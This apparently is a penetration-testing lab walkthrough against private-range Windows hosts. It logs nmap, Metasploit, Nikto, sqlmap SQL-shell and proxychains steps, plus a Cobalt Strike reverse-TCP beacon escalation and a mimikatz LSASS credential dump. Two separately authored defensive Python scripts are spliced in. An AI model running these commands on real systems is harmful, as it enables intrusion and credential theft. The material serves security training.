```
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV 192.168.1.99 --script=vuln
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-30 04:30 EDT
Stats: 0:06:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for WIN-7DSM1JVE9PO (192.168.1.99)
Host is up (0.0011s latency).
Not shown: 993 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach)
PORT      STATE SERVICE            VERSION
80/tcp    open  tcpwrapped
|_http-server-header: Microsoft-IIS/7.5
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49154/tcp open  unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 554.63 seconds
```
```
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
```
Use the auxiliary/scanner/rdp/ms12_020_check module.
```
msf6 > use auxiliary/scanner/rdp/ms12_020_check
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.1.99
rhosts => 192.168.1.99
msf6 auxiliary(scanner/rdp/ms12_020_check) > exploit

[+] 192.168.1.99:3389     - 192.168.1.99:3389 - The target is vulnerable.
[*] 192.168.1.99:3389     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
This reports "The target is vulnerable.", but the exploit I found for this vulnerability had no effect on the target. Next we move on and try another module.
```
┌──(kali㉿kali)-[~/Desktop]
└─$ nikto -host http://192.168.1.99
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.99
+ Target Hostname:    192.168.1.99
+ Target Port:        80
+ Start Time:         2022-06-30 05:33:14 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-aspnet-version header: 2.0.50727
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 8068 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-06-30 05:34:13 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
```
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:05:41 /2022-06-30/

[06:05:42] [INFO] resuming back-end DBMS 'microsoft sql server'
...
[06:09:00] [CRITICAL] connection timed out to the target URL

[*] ending @ 06:09:00 /2022-06-30/
```
Writing a shell
Automated exploitation can't be used here, so it has to be done by hand. --sql-shell is used to execute database statements directly.
```
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap "http://192.168.1.99?user_id=1" --sql-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.6#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:44:35 /2022-06-30/

...
[06:44:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: ASP.NET 2.0.50727, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[06:44:35] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
```
```
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:10:47 /2022-06-30/

[10:10:47] [INFO] flushing session file
...
Database: FoundStone_Bank
Table: tmp
[6 entries]
+----------------+
| dir            |
+----------------+
| custerr        |
| edrfgyhujikopl |
| history        |
| logs           |
| temp           |
| wwwroot        |
+----------------+

[10:11:27] [INFO] table 'FoundStone_Bank.dbo.tmp' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.1.99/dump/FoundStone_Bank/tmp.csv'
[10:11:27] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 61 times
[10:11:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.99'

[*] ending @ 10:11:27 /2022-06-30/
```
```
┌──(kali㉿kali)-[~/Downloads]
└─$ proxychains4 nmap -sV 192.168.153.128
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 05:56 EDT
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:53  <--denied
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:1025  <--denied
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:5900  <--denied
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:554  <--denied
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:113  <--denied
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:1720  <--denied
[proxychains] Strict chain  ...  127.0.0.1:23869  ...  192.168.153.128:25  <--denied
...
Nmap scan report for 192.168.153.128
Host is up (1.1s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: WIN-HF4NQED9HKF; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1213.51 seconds
```

```
┌──(kali㉿kali)-[~/Downloads]
└─$ proxychains4 nmap -sV 192.168.153.128 -p80,135,139,445,3389,5357,49152-49158 --script=vuln
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 02:13 EDT
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:135  ...  OK
...
Nmap scan report for 192.168.153.128
Host is up (1.6s latency).

PORT      STATE  SERVICE        VERSION
80/tcp    open   http           Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
|_http-trace: TRACE is enabled
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp   open   msrpc?
139/tcp   open   netbios-ssn?
445/tcp   open   microsoft-ds?
3389/tcp  open   ms-wbt-server?
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5357/tcp  open   wsdapi?
49152/tcp open   unknown
49153/tcp open   unknown
49154/tcp open   unknown
49155/tcp open   unknown
49156/tcp open   unknown
49157/tcp closed unknown
49158/tcp open   unknown

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1188.52 seconds
```
From the results above we can see that this host has the same vulnerabilities as the Windows Server 2008 host. Next we use msfconsole's exploitation modules to verify whether they can actually be used.
```
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
```
Use the auxiliary/scanner/rdp/ms12_020_check module.
```
msf6 > use auxiliary/scanner/rdp/ms12_020_check
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.153.128
rhosts => 192.168.153.128
msf6 auxiliary(scanner/rdp/ms12_020_check) > exploit

[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:3389  ...  OK
[+] 192.168.153.128:3389  - 192.168.153.128:3389 - The target is vulnerable.
[*] 192.168.153.128:3389  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
This reports "The target is vulnerable.", but the exploit I found for this vulnerability had no effect on the target. Next we move on and try another module.
```
┌──(kali㉿kali)-[~/Downloads]
└─$ proxychains4 nikto -host http://192.168.153.128
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
- Nikto v2.1.6
---------------------------------------------------------------------------
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:80  ...  OK
+ Target IP:          192.168.153.128
+ Target Hostname:    192.168.153.128
+ Target Port:        80
+ Start Time:         2022-07-02 02:33:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
+ Retrieved x-powered-by header: PHP/7.3.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.128:80  ...  OK
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
- STATUS: Completed 3190 requests (~46% complete, 16.6 minutes left): currently in plugin 'Nikto Tests'
- STATUS: Running average: 100 requests: 0.22830 sec, 10 requests: 0.1804 sec.
+ Scan terminated: 12 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-07-02 03:13:08 (GMT-4) (2369 seconds)
```
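The two Nikto runs above (against the IIS 7.5 host and against the Apache host) report the same response-header gaps, and the second one also shows the TRACE method enabled. The script below is an added example, not part of this write-up and not Nikto's own code: it parses a raw HTTP response and reproduces those findings (missing X-Frame-Options and X-Content-Type-Options, TRACE advertised in Allow, version-disclosing Server / X-Powered-By / X-AspNet-Version headers), then shows a hardened response passing clean. Both sample responses are constructed to resemble the hosts above, not captured from them. The X-XSS-Protection header that Nikto also mentions is deliberately not checked: current browsers ignore it, so adding it fixes nothing.

```python
"""Audit an HTTP response for the header weaknesses Nikto reported.

Added example (not from the original write-up). The two sample responses are
constructed, not captured from the hosts in the write-up.
"""
from __future__ import annotations

# Headers a hardened server should send, with the accepted values (lower-case).
REQUIRED_HEADERS = {
    "x-frame-options": {"deny", "sameorigin"},
    "x-content-type-options": {"nosniff"},
}

# Headers that only serve to fingerprint the stack; strip or blank them.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version")

# Methods that should not be reachable on a production site (XST surface).
UNSAFE_METHODS = {"TRACE", "TRACK"}


def parse_response(raw: bytes) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP/1.x response into (status line, header dict).

    Header names are lower-cased; repeated headers are joined with ", ",
    the list form HTTP permits, so a duplicated Allow header still audits.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = lines[0]
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate a junk line instead of aborting the audit
        name, value = line.split(":", 1)
        name = name.strip().lower()
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status, headers


def audit_headers(headers: dict[str, str]) -> list[str]:
    """Return a list of findings; empty means the response looks hardened."""
    findings: list[str] = []
    for name, accepted in REQUIRED_HEADERS.items():
        value = headers.get(name)
        if value is None:
            findings.append(f"missing header: {name}")
        elif value.lower() not in accepted:
            findings.append(f"unexpected value for {name}: {value!r}")
    allow = headers.get("allow", "")
    advertised = {m.strip().upper() for m in allow.split(",") if m.strip()}
    for method in sorted(advertised & UNSAFE_METHODS):
        findings.append(f"{method} method advertised in Allow")
    for name in FINGERPRINT_HEADERS:
        if name in headers:
            findings.append(f"version disclosure: {name}: {headers[name]}")
    return findings


def audit_raw(raw: bytes) -> list[str]:
    """Convenience wrapper: parse, then audit."""
    _status, headers = parse_response(raw)
    return audit_headers(headers)


# Constructed sample shaped like an OPTIONS response from an IIS 7.5 / ASP.NET host.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"X-AspNet-Version: 2.0.50727\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# The same response after the fixes a defender would apply (constructed).
HARDENED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Allow: OPTIONS, GET, HEAD, POST\r\n"
    b"X-Frame-Options: SAMEORIGIN\r\n"
    b"X-Content-Type-Options: nosniff\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, raw in (("weak", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"[{label}]")
        for finding in audit_raw(raw) or ["no findings"]:
            print("  -", finding)
```

Run it directly to print both audits; `audit_headers` can equally be fed the header dict from any HTTP client's response to a live server. On IIS the fixes are the two headers under `<httpProtocol><customHeaders>` in web.config and a request-filtering rule denying the TRACE verb; on Apache, `TraceEnable off` plus `Header always set` for the two headers.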
The only remaining option is to use certutil to request the open port 80 on the Windows Server 2008 host (Windows 7 has no outbound internet access, Windows Server 2008 happens to have port 80 open, and we already have access to Windows Server 2008, so we can confirm the request by inspecting the IIS request logs on Windows Server 2008).
```
beacon> shell dir C:\inetpub\logs\LogFiles\W3SVC1\
[*] Tasked beacon to run: dir C:\inetpub\logs\LogFiles\W3SVC1\
[+] host called home, sent: 67 bytes
[+] received output:
 驱动器 C 中的卷没有标签。
 卷的序列号是 DCD2-557A
```
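The step above relies on the IIS logs under C:\inetpub\logs\LogFiles\W3SVC1\ to confirm that the Windows 7 host reached port 80. The following is an added example, not code from the write-up: a parser for the W3C extended format that IIS writes there, which reads the #Fields directive so the column order does not matter, and then flags any request from the Windows 7 host (192.168.153.128) or carrying the Microsoft-CryptoAPI user-agent that certutil's URL fetch sends. From the defender's side this is the same evidence a reviewer of those logs would look for. The log lines are constructed, and the server address 192.168.153.200 is a placeholder, since the write-up does not give the IIS host's internal address.

```python
r"""Scan IIS W3C extended logs for requests from a pivot host.

Added example, not part of the original write-up. In the W3C format, '#' lines
are directives and '#Fields:' names the columns of the rows that follow; IIS
replaces spaces inside a field value (e.g. the User-Agent) with '+'.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# certutil fetches URLs through CryptoAPI, so its requests carry this agent string.
CRYPTOAPI_UA = re.compile(r"Microsoft-CryptoAPI/", re.IGNORECASE)


@dataclass
class Hit:
    date: str
    time: str
    client_ip: str
    method: str
    uri: str
    status: str
    user_agent: str
    reason: str


def parse_w3c(text: str) -> list[dict[str, str]]:
    """Parse W3C extended log text into one dict per request row.

    The column layout comes from the latest '#Fields:' directive, so the parser
    copes with whatever field set the administrator enabled. Rows whose column
    count does not match are skipped rather than silently mis-assigned.
    """
    fields: list[str] = []
    rows: list[dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # #Software, #Version, #Date carry no request data
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue
        rows.append(dict(zip(fields, values)))
    return rows


def find_hits(rows: list[dict[str, str]], watched_ips: set[str]) -> list[Hit]:
    """Return rows that came from a watched client or look like a CryptoAPI fetch."""
    hits: list[Hit] = []
    for row in rows:
        ip = row.get("c-ip", "-")
        # Undo the '+' encoding so the agent string reads as the client sent it.
        ua = row.get("cs(User-Agent)", "-").replace("+", " ")
        reasons = []
        if ip in watched_ips:
            reasons.append(f"request from watched host {ip}")
        if CRYPTOAPI_UA.search(ua):
            reasons.append("CryptoAPI user-agent (certutil-style URL fetch)")
        if reasons:
            hits.append(Hit(row.get("date", "-"), row.get("time", "-"), ip,
                            row.get("cs-method", "-"), row.get("cs-uri-stem", "-"),
                            row.get("sc-status", "-"), ua, "; ".join(reasons)))
    return hits


# Constructed sample log. 192.168.153.200 is a placeholder for the IIS host's
# internal address (not given in the write-up); 192.168.153.128 is the Windows 7 host.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2022-07-02 13:40:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2022-07-02 13:40:12 192.168.153.200 GET /index.aspx - 80 - 192.168.1.50 Mozilla/5.0+(Windows+NT+6.1)+Firefox/91.0 200 0 0 15
2022-07-02 13:41:03 192.168.153.200 GET /probe.txt - 80 - 192.168.153.128 Microsoft-CryptoAPI/6.1 404 0 2 3
2022-07-02 13:41:40 192.168.153.200 GET /login.aspx user_id=1 80 - 192.168.1.50 Mozilla/5.0+(Windows+NT+6.1)+Firefox/91.0 500 0 0 31
this line is malformed and must be skipped
"""

WATCHED = {"192.168.153.128"}

if __name__ == "__main__":
    for hit in find_hits(parse_w3c(SAMPLE_LOG), WATCHED):
        print(f"{hit.date} {hit.time} {hit.client_ip} {hit.method} {hit.uri} "
              f"-> {hit.status} [{hit.user_agent}] {hit.reason}")
```

On the sample data only the probe from 192.168.153.128 is reported, with both reasons attached; the 404 does not matter, since the point is that the connection reached IIS at all. As a standing detection, a CryptoAPI user-agent fetching anything other than certificate or CRL material from an internal web server is a reasonable alert condition in its own right.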
```
┌──(kali㉿kali)-[~/Desktop]
└─$ proxychains4 nmap -p80 192.168.153.129 --script=vuln
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 09:12 EDT
[proxychains] Strict chain  ...  127.0.0.1:45483  ...  192.168.153.129:80  ...  OK
...
Nmap scan report for 192.168.153.129
Host is up (0.20s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-trace: TRACE is enabled
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 232.50 seconds
```
```
┌──(kali㉿kali)-[~/Desktop]
└─$ proxychains4 nikto -host http://192.168.153.129
[proxychains] config file found: /etc/proxychains4.conf
...
[proxychains] DLL init: proxychains-ng 4.16
- Nikto v2.1.6
---------------------------------------------------------------------------
...
+ Target IP:          192.168.153.129
+ Target Hostname:    192.168.153.129
+ Target Port:        80
+ Start Time:         2022-07-02 09:22:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
+ Retrieved x-powered-by header: PHP/7.3.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.153.129/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 15 error(s) and 8 item(s) reported on remote host
+ End Time:           2022-07-02 09:33:10 (GMT-4) (660 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
```
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
```
```
beacon> elevate svc-exe b_192.168.153.130
[*] Tasked beacon to run windows/beacon_reverse_tcp (192.168.153.130:4444) via Service Control Manager (\\127.0.0.1\ADMIN$\ba77d60.exe)
[+] host called home, sent: 285738 bytes
[+] host called home, sent: 1819 bytes
[+] received output:
Started service ba77d60 on .
```
```
┌──(kali㉿kali)-[~/Desktop]
└─$ wine /usr/share/windows-resources/mimikatz/x64/mimikatz.exe "sekurlsa::minidump e723ff153" "sekurlsa::logonPasswords full" exit
0040:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

>>> INIT of 'kerberos' module failed : c0000001
0050:err:ole:start_rpcss Failed to open RpcSs service

mimikatz(commandline) # sekurlsa::minidump e723ff153
Switch to MINIDUMP : 'e723ff153'

mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'e723ff153' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed
```